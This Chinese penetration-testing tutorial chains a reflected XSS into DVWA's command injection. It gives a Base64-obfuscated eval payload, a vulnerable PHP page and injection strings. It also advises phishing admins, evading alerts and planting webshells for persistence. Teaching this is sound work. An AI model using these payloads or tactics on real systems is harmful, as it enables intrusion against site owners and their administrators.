前端漏洞触发后端RCE渗透测试技术详解

一、技术背景与原理

在实际渗透测试中，经常会遇到目标系统使用带有后台RCE漏洞的CMS系统，但由于缺乏直接访问权限而无法利用。本技术通过前端漏洞（如XSS）间接触发后端RCE漏洞，实现权限提升。

核心原理：利用前端漏洞（如XSS）作为跳板，构造恶意请求触发后端存在的RCE漏洞，实现从低权限前端到高权限后端的攻击链。

二、实验环境搭建

1. 靶机环境

• 使用DVWA（Damn Vulnerable Web Application）作为演示靶机
• 启用DVWA中的"Command Injection"（命令注入）漏洞模块
• 确保DVWA运行在http://192.168.64.129/DVWA/

2. 漏洞模拟环境

创建一个简单的XSS漏洞页面php.php：

<?php
highlight_file(__FILE__);
$id = $_GET['id'];
echo ($id);
?>

三、基础漏洞验证

1. 命令注入验证

在DVWA的命令注入模块尝试基础注入：

1;ls

通过Burp Suite抓包可观察到：

• 请求类型：POST
• 请求路径：/DVWA/vulnerabilities/exec/
• 参数格式：

  ip=1;ls&Submit=Submit
  

2. XSS漏洞验证

在php.php页面测试XSS：

http://example.com/php.php?id=<script>alert(1)</script>

四、攻击链构造

1. 前端XSS利用

构造恶意XSS Payload，包含以下组件：

a. jQuery加载（目标无jQuery时）

<script type="text/javascript" src="http://code.jquery.com/jquery-1.7.2.min.js"></script>

b. Ajax构造RCE请求

$.post('http://192.168.64.129/DVWA/vulnerabilities/exec/',
  function(d) {
    let p = $(d).contents().find('input[name=\"path\"]').val();
    $.ajax({
      url: 'http://192.168.64.129/DVWA/vulnerabilities/exec/',
      type: 'POST',
      data: {
        "ip": '1;touch /tmp/pwned', // 要执行的命令
        "Submit": "Submit"
      }
    });
  }
);

2. Payload编码处理

为防止特殊字符导致转义问题，需对JavaScript代码进行Base64编码：

JC5wb3N0KCdodHRwOi8vMTkyLjE2OC42NC4xMjkvRFZXQS92dWxuZXJhYmlsaXRpZXMvZXhlYy8nLAogIGZ1bmN0aW9uKGQpIHsKICAgIGxldCBwID0gJChkKS5jb250ZW50cygpLmZpbmQoJ2lucHV0W25hbWU9XCJwYXRoXCJdJykudmFsKCk7CiAgICAkLmFqYXgoewogICAgICB1cmw6ICdodHRwOi8vMTkyLjE2OC42NC4xMjkvRFZXQS92dWxuZXJhYmlsaXRpZXMvZXhlYy8nLAogICAgICB0eXBlOiAnUE9TVCcsCiAgICAgIGRhdGE6IHsKICAgICAgICAiaXAiOiAnMTt0b3VjaCAvdG1wL3B3bmVkJywKICAgICAgICAiU3VibWl0IjogIlN1Ym1pdCIKICAgICAgfQogICAgfSk7CiAgfQopOw==

3. 最终Payload构造

使用atob函数解码执行Base64编码的Payload：

<script>eval(atob('JC5wb3N0KCdodHRwOi8vMTkyLjE2OC42NC4xMjkvRFZXQS92dWxuZXJhYmlsaXRpZXMvZXhlYy8nLAogIGZ1bmN0aW9uKGQpIHsKICAgIGxldCBwID0gJChkKS5jb250ZW50cygpLmZpbmQoJ2lucHV0W25hbWU9XCJwYXRoXCJdJykudmFsKCk7CiAgICAkLmFqYXgoewogICAgICB1cmw6ICdodHRwOi8vMTkyLjE2OC42NC4xMjkvRFZXQS92dWxuZXJhYmlsaXRpZXMvZXhlYy8nLAogICAgICB0eXBlOiAnUE9TVCcsCiAgICAgIGRhdGE6IHsKICAgICAgICAiaXAiOiAnMTt0b3VjaCAvdG1wL3B3bmVkJywKICAgICAgICAiU3VibWl0IjogIlN1Ym1pdCIKICAgICAgfQogICAgfSk7CiAgfQopOw=='));</script>

五、攻击流程详解

1. 诱导管理员访问：通过钓鱼邮件等方式诱导管理员访问含有XSS漏洞的页面
2. jQuery加载：目标页面加载远程jQuery库（如目标已存在则跳过）
3. Ajax请求构造：执行Base64解码后的JavaScript代码
4. CSRF Token获取（如有）：从响应中提取CSRF Token（本例中DVWA无此防护）
5. RCE请求发送：向命令注入端点发送恶意POST请求
6. 命令执行：后端执行注入的命令（本例中创建/tmp/pwned文件）

六、防御措施

1. 前端防御

• 对所有用户输入进行严格的输出编码（HTML Entity编码等）
• 实施Content Security Policy (CSP)策略
• 避免使用eval()、innerHTML等危险函数

2. 后端防御

• 对所有输入参数进行严格过滤和验证
• 实施CSRF Token机制
• 使用白名单方式限制命令执行参数
• 最小权限原则运行Web服务

3. 系统级防御

• 定期更新CMS和组件
• 实施WAF防护
• 日志监控异常请求

七、技术变种与扩展

1. 无jQuery环境：使用原生XMLHttpRequest实现Ajax请求
2. CSP绕过技术：利用可信域或JSONP端点绕过CSP限制
3. 存储型XSS利用：通过论坛、评论等持久化存储扩大攻击面
4. 结合其他漏洞：与CSRF、SSRF等漏洞组合利用

八、实际应用注意事项

1. 目标环境适配：根据实际目标调整Payload（如路径、参数名等）
2. 编码处理：根据上下文选择合适的编码方式（URL编码、HTML编码等）
3. 隐蔽性考虑：使用更隐蔽的命令执行方式，避免触发安全警报
4. 权限维持：成功后建立更持久的访问通道（如Webshell）

通过本技术，渗透测试人员可以深入了解前端漏洞如何作为跳板触发后端高危漏洞，从而更全面地评估系统安全性。